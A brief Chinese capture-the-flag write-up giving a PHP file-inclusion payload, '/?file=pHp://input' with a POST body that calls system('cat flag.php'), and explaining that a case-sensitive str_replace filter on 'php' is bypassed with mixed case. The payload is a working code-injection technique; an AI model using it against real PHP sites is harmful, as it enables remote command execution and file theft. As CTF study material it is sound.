/?file=pHp://input postdata: <?php system('cat flag.php'); ?>
str_replace("php", "???", $file); 只过滤了小写的php,所以get方式可以通过PHP大写绕过,但是不能绕过flag.php文件,因此采用了phpinput方式。
如有更好姿势欢迎留言,